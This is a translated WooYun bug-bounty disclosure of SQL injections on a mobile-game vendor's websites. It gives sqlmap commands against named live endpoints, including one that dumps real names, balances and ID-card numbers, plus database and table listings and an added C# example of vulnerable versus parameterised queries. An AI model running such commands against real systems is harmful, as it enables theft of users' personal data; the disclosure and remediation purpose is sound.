
Vulnerability summary (followers: 24)

Defect ID: wooyun-2016-0184694

Title: Game security: bundled SQL injections on a mobile-game site allow cross-database queries (millions of user records involved)

Vendor: caohua.com

Author: 黑色键盘丶

Submitted: 2016-04-09 13:33

Fixed: 2016-05-24 14:30

Published: 2016-05-24 14:30

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-04-09: Details sent to the vendor, awaiting vendor handling
2016-04-09: Vendor confirmed; details disclosed to the vendor only
2016-04-19: Details disclosed to core white hats and relevant domain experts
2016-04-29: Details disclosed to regular white hats
2016-05-09: Details disclosed to intern white hats
2016-05-24: Details disclosed to the public

Brief description:

See title.

Detailed description:

Subsite POST injection:

E:\sqlmap>sqlmap.py -u "http://cms.caohua.com/Member/Register.aspx" --data "__hash__=QZKMhJ1pv8RhKGxQvSBk9RWXBes%2Bi23q%2FWF3%2BODYAlA%3D&__action__=jvXQDpVsgMFrewgNVdPG1X5DJ2nGcGtHt5dvuyNhp6s%3D&txtLoginPass=88952634&txtLoginPass_2=88952634&txtQQ=88952634&txtCheckNum=88952634&txtUserName=88952634" -D MobPlatform -T Data_UserAccount -C "RealName,CountMoney,IDCard" --dump


----------------------------------

Main site POST injection:

E:\sqlmap>sqlmap.py -u "http://www.caohua.com/game.html" --data "content=88952634" --current-db


----------------------------

Main site POST injection:

E:\sqlmap>sqlmap.py -u "http://www.caohua.com/soulb" --data "packcent=88952634" --dbs


-------------------------------

E:\sqlmap>sqlmap.py -u "http://admin.caohua.com/Web/Member/Member.ashx?m=isRepeat&UserName=" --dbs


------------------------------

E:\sqlmap>sqlmap.py -u "http://activity.caohua.com/MarchSKAjax/AjaxIndex.ashx?m=GetQuery&uid=1" --dbs


-----------------------------

E:\sqlmap>sqlmap.py -u "http://wap.caohua.com/Web/Game/GameList/BSearchGame.ashx?Content=" --dbs


All 10 databases can be queried.



Database MobPlatform:

Database: MobPlatform
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| dbo.Data_ProDownLoad | 6415950 |
| dbo.Data_CallBackError | 6067433 |
| dbo.Data_ProCPA | 5775310 |
| dbo.Data_ProductUsers | 5586541 |
| dbo.ExtData_SourcePlanTotalCount | 1663380 |
| dbo.Data_UserAccount | 1388708 |
| dbo.ExtData_UserPlanTotalCount | 1333119 |
| dbo.Data_ProductOrder | 1230833 |
| dbo.Data_ProCPS | 1151720 |
| dbo.Data_ProductGift | 1107720 |
| dbo.ExtData_SourceTotalCount | 1070893 |
| dbo.Data_SourcePlanTotalCount | 976886 |
| dbo.Data_ProLogin | 840158 |
| dbo.Data_UserPlanTotalCount | 654747 |
| dbo.ExtData_PlanTotalCount | 587222 |
| dbo.ExtData_ProductTotalCount | 485816 |
| dbo.Data_PlanTotalCount | 323250 |
| dbo.Data_SourceTotalCount | 145167 |
| dbo.Data_UserTotalCount | 84706 |
| dbo.Base_SourceAPKInfo | 52370 |
| dbo.Data_UserPayOrder | 33938 |
| dbo.Data_ProductTotalCount | 26426 |
| dbo.Base_Server | 18644 |
| dbo.Base_UserAdvertPlan | 14106 |
| dbo.Data_GiftCheck | 10178 |
| dbo.Data_SourceMoneyToMember | 9592 |
| dbo.Data_UserBillRecords | 6312 |
| dbo.Base_SourceAdvertPlan | 5660 |
| dbo.MS_Menu_Role | 3902 |
| dbo.Data_UserSecret | 3583 |
| dbo.PS_SiteData | 3523 |
| dbo.Base_DrawOrders | 3448 |
| dbo.Base_UserSource | 2614 |
| dbo.Base_UserAccount | 2232 |
| dbo.Base_UserInfo | 2214 |
| dbo.Base_UserPersonal | 1162 |
| dbo.Data_MSDKPayOrders | 1118 |
| dbo.Base_UserBankInfo | 1044 |
| dbo.Base_ProductGift | 513 |
| dbo.Base_SourceHtml | 469 |
| dbo.Base_UserCompany | 382 |
| dbo.PS_Mixed | 309 |
| dbo.Base_AdvertPlan | 227 |
| dbo.MSreplication_objects | 219 |
| dbo.Data_SourceChargeApply | 175 |
| dbo.Base_ProductInfo | 169 |
| dbo.MS_Manager_Role | 89 |
| dbo.MS_Manager_Role | 89 |
| dbo.BBS_Topic | 57 |
| dbo.PS_ArticleClass | 53 |
| dbo.PS_ArticleClass | 53 |
| dbo.MS_Role | 48 |
| dbo.Data_UserMoneyInsertPost | 44 |
| dbo.PS_AdsClass | 23 |
| dbo.PS_AdsClass | 23 |
| dbo.MS_Dept | 18 |
| dbo.PS_Payment | 16 |
| dbo.Base_Corner | 14 |
| dbo.Base_ProductArticle | 7 |
| dbo.SDK_Class | 5 |
| dbo.Base_PackServer | 4 |
| dbo.Data_ArticleClass | 2 |
| dbo.Data_ProductInfo | 2 |
| dbo.CN_Menu | 1 |
| dbo.MS_Config | 1 |
| dbo.MSreplication_subscriptions | 1 |
| dbo.MSsubscription_agents | 1 |
+----------------------------------+---------+


Database MobUsers_DB:

Database: MobUsers_DB
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| dbo.Data_UserAccount | 5701357 |
+----------------------+---------+


Database MobGame_DB:

Database: MobGame_DB
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| dbo.Re_OldUser | 4916892 |
| dbo.Ur_WalletLog | 2647587 |
| dbo.Ur_DoWork | 1610735 |
| dbo.SC_GetLog | 1497556 |
| dbo.SC_TaskLog | 1497556 |
| dbo.Us_Info | 1374572 |
| dbo.Ge_GiftCode | 1002609 |
| dbo.Ge_GiftCode | 1002609 |
| dbo.Data_CallBackError | 632818 |
| dbo.AC_Player | 316155 |
| dbo.CH_SignLog | 243104 |
| dbo.AC_FinshRole | 236807 |
| dbo.Or_PayOrder | 182786 |
| dbo.Or_GameOrder | 161090 |
| dbo.CH_RewardLog | 52355 |
| dbo.SG_SignLog | 49922 |
| dbo.HP_Integral | 38682 |
| dbo.CH_Player | 32054 |
| dbo.NY_SignLog | 30008 |
| dbo.SI_Info | 27695 |
| dbo.HP_ISDonate | 26467 |
| dbo.CH_GetLog | 23399 |
| dbo.SG_GetLog | 22206 |
| dbo.HL_GetLog | 19799 |
| dbo.HL_DrawLog | 19014 |
| dbo.CH_Order | 15963 |
| dbo.NY_Blessing | 13916 |
| dbo.SI_Player | 13011 |
| dbo.SK_GrabLog | 12175 |
| dbo.SI_GiftLog | 10525 |
| dbo.NY_Player | 9888 |
| dbo.SG_Player | 9452 |
| dbo.RP_GetLog | 8559 |
| dbo.AC_Receive | 7889 |
| dbo.AC_Rotary | 7889 |
| dbo.RP_Player | 5868 |
| dbo.SK_GetLog | 5501 |
| dbo.NY_PayOrder | 4339 |
| dbo.SK_Player | 3954 |
| dbo.PS_SiteData | 3523 |
| dbo.Us_Wallet | 3511 |
| dbo.MK_Order | 3246 |
| dbo.HL_Player | 2916 |
| dbo.Re_Order | 2681 |
| dbo.SI_UserRole | 2550 |
| dbo.NY_ClockLog | 2089 |
| dbo.RP_Order | 1933 |
| dbo.MS_Menu_Role | 1915 |
| dbo.MK_GetLog | 1854 |
| dbo.HL_ExchangeGiftCode | 1804 |
| dbo.HL_ExchangeGiftCode | 1804 |
| dbo.MK_Player | 988 |
| dbo.MSreplication_objects | 303 |
| dbo.Ge_Info | 119 |
| dbo.SK_Gift | 96 |
| dbo.Ur_Work | 92 |
| dbo.PM_Order | 71 |
| dbo.MS_Manager_Role | 42 |
| dbo.MS_Manager_Role | 42 |
| dbo.SC_PlayerPlace | 34 |
| dbo.SC_PlayerPlace | 34 |
| dbo.PS_ArticleClass | 22 |
| dbo.PS_ArticleClass | 22 |
| dbo.PS_AdsClass | 19 |
| dbo.PS_AdsClass | 19 |
| dbo.PS_Mixed | 18 |
| dbo.AC_Prize | 17 |
| dbo.SG_Gift | 15 |
| dbo.SK_TimeField | 15 |
| dbo.HL_Gift | 13 |
| dbo.MS_Role | 12 |
| dbo.SC_Scratch | 11 |
| dbo.AC_Gift | 10 |
| dbo.CH_Gift | 10 |
| dbo.MR_Rank | 10 |
| dbo.PS_Payment | 10 |
| dbo.SI_Gitf | 10 |
| dbo.MK_Rebate | 8 |
| dbo.RP_Gift | 8 |
| dbo.SC_Gift | 8 |
| dbo.System_Configs | 8 |
| dbo.MS_Dept | 7 |
| dbo.NY_Gift | 7 |
| dbo.PM_Product | 5 |
| dbo.Ms_Config | 4 |
| dbo.Re_Info | 4 |
| dbo.SK_Seckill | 4 |
| dbo.Data_Discount | 3 |
| dbo.AC_Role | 2 |
| dbo.HL_Turntable | 2 |
| dbo.RP_TimeField | 2 |
| dbo.SG_Role | 2 |
| dbo.CH_Role | 1 |
| dbo.HP_Donate | 1 |
| dbo.MK_Role | 1 |
| dbo.MSreplication_subscriptions | 1 |
| dbo.MSsubscription_agents | 1 |
| dbo.NY_NewYear | 1 |
| dbo.RP_RedPackets | 1 |
| dbo.SI_Role | 1 |
+---------------------------------+---------+


This database also yields the forum (BBS) credentials:

Database: MobGame_DB
Table: Us_Info
[19 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| Active | int |
| AddDateTime | datetime |
| BBSPwd | varchar |
| Birthday | datetime |
| Email | varchar |
| GiveMoney | decimal |
| IDCard | varchar |
| Install | int |
| LoginName | varchar |
| NickName | varchar |
| Password | varchar |
| Pay | decimal |
| QQ | varchar |
| Rank_ID | int |
| RealName | varchar |
| Status | char |
| Tel | varchar |
| Token | varchar |
| UpdateDateTime | datetime |
+----------------+----------+


I ran a few of the large ones; there are several more that I won't demonstrate one by one.

Proof of vulnerability:


Remediation:

You know what to do.
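An added example, not the vendor's code (the report shows no source): the pattern behind an endpoint such as Member.ashx?m=isRepeat&UserName=, written the defective way beside the parameterised fix. The handler name, the connection-string key and the LoginName column on dbo.Data_UserAccount are assumptions; the table and database names are taken from the dump above.

```csharp
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web;

// Hypothetical ASP.NET generic handler, modelled on the report's
// Member.ashx?m=isRepeat&UserName= endpoint. Assumed shape; not the vendor's code.
public class MemberHandler : IHttpHandler
{
    // "MobPlatform" is an assumed connection-string name matching the dumped database.
    private static readonly string ConnStr =
        ConfigurationManager.ConnectionStrings["MobPlatform"].ConnectionString;

    public bool IsReusable { get { return false; } }

    public void ProcessRequest(HttpContext ctx)
    {
        string userName = ctx.Request["UserName"] ?? string.Empty;
        bool exists = UserExistsSafe(userName);   // only the hardened path is wired up
        ctx.Response.ContentType = "text/plain";
        ctx.Response.Write(exists ? "1" : "0");
    }

    // Defective pattern: the parameter is spliced into the SQL text, so a quote in
    // UserName rewrites the query. This is the bug class the report's sqlmap runs found.
    static bool UserExistsVulnerable(string userName)
    {
        string sql = "SELECT COUNT(*) FROM dbo.Data_UserAccount WHERE LoginName = '" + userName + "'";
        using (var cn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, cn))
        {
            cn.Open();
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // Hardened: the value travels as a typed parameter and never as SQL text; the
    // length cap matches the assumed column width and the response is a bare yes/no.
    static bool UserExistsSafe(string userName)
    {
        if (userName.Length == 0 || userName.Length > 32) return false;
        const string sql = "SELECT COUNT(*) FROM dbo.Data_UserAccount WHERE LoginName = @name";
        using (var cn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, cn))
        {
            cmd.Parameters.Add("@name", SqlDbType.NVarChar, 32).Value = userName;
            cn.Open();
            return (int)cmd.ExecuteScalar() > 0;
        }
    }
}
```

The vendor's reply that databases were queryable across database boundaries points to the application login holding rights on MobPlatform, MobUsers_DB and MobGame_DB at once; giving each web application a login with rights only on its own database keeps any remaining injection from reaching the others.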

Copyright notice: when reposting, credit the source: 黑色键盘丶@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2016-04-09 14:20

Vendor reply:

Databases can be queried across database boundaries; information leakage.

Latest status:

2016-05-06: Fixed


Comments:

  1. 2016-04-09 11:57 | 黑色键盘丶 (Regular white hat | Rank: 1527 | Vulnerabilities: 310 | Bro is a lone wolf in the wind)

    Game vendors all hand out gifts, hehe; wonder whether this one does.

  2. 2016-04-09 17:41 | Exploit DB (Regular white hat | Rank: 475 | Vulnerabilities: 132 | Water that carries a boat can also capsize it)

    @黑色键盘丶 Bro, is it two GETs and one POST?

  3. 2016-04-09 17:45 | Exploit DB (Regular white hat | Rank: 475 | Vulnerabilities: 132 | Water that carries a boat can also capsize it)

    @黑色键盘丶 Three GETs.

  4. 2016-04-09 17:46 | 黑色键盘丶 (Regular white hat | Rank: 1527 | Vulnerabilities: 310 | Bro is a lone wolf in the wind)

    @Exploit DB I submitted 6 spots.

  5. 2016-04-09 17:48 | Exploit DB (Regular white hat | Rank: 475 | Vulnerabilities: 132 | Water that carries a boat can also capsize it)

    @黑色键盘丶 Leave a QQ so we can talk. My initial testing found four spots. When you say six, do you mean injections in different parameters under the same site, or different sites? That is, subdomains.

  6. 2016-04-09 18:33 | 黑色键盘丶 (Regular white hat | Rank: 1527 | Vulnerabilities: 310 | Bro is a lone wolf in the wind)

    @Exploit DB 1